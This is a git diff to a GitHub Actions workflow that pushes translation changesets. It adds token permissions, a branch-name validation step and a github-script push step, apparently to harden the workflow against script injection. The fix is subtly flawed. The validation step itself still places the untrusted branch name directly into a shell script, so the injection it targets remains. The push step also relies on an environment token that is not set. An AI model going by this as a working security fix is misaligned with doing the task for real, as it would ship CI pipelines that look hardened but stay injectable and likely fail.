diff --git a/.github/workflows/translations-changeset.yml b/.github/workflows/translations-changeset.yml
index 84cacf3a50..622b0e3867 100644
--- a/.github/workflows/translations-changeset.yml
+++ b/.github/workflows/translations-changeset.yml
@@ -11,6 +11,10 @@ jobs:
   create-translations-patch:
     if: github.actor == 'bc-svc-local'
     runs-on: ubuntu-latest
+    # Add permissions block to limit token scope
+    permissions:
+      contents: write
+      pull-requests: write
 
     steps:
       - name: Checkout repo
@@ -18,6 +22,16 @@ jobs:
         with:
           fetch-depth: 2
 
+      - name: Validate inputs
+        id: validate
+        run: |
+          # Validate ref name against allowed pattern (alphanumeric, dash, underscore, and forward slash only)
+          if ! [[ "${{ github.event.pull_request.head.ref }}" =~ ^[a-zA-Z0-9/_-]+$ ]]; then
+            echo "Error: Invalid branch name format"
+            exit 1
+          fi
+          echo "ref=${{ github.event.pull_request.head.ref }}" >> $GITHUB_OUTPUT
+
       - name: Use commit SHA for filename
         id: generate-sha
         run: |
@@ -44,8 +58,16 @@ jobs:
           git add .changeset/translations-patch-$SHORT_SHA.md
           git commit -m "chore(core): create translations patch"
       
-      - name: Push changeset
-        env:
-          TOKEN: ${{ secrets.GITHUB_TOKEN }}
-        run: |
-          git push https://x-access-token:${{ secrets.GITHUB_TOKEN }}@github.com/${{ github.repository }} HEAD:${{ github.event.pull_request.head.ref }}
+      - name: Push changes
+        uses: actions/github-script@v7
+        with:
+          github-token: ${{ secrets.GITHUB_TOKEN }}
+          script: |
+            const { repo, owner } = context.repo;
+            const ref = '${{ steps.validate.outputs.ref }}';
+            
+            await exec.exec('git', [
+              'push',
+              `https://x-access-token:${process.env.GITHUB_TOKEN}@github.com/${owner}/${repo}`,
+              `HEAD:${ref}`
+            ]);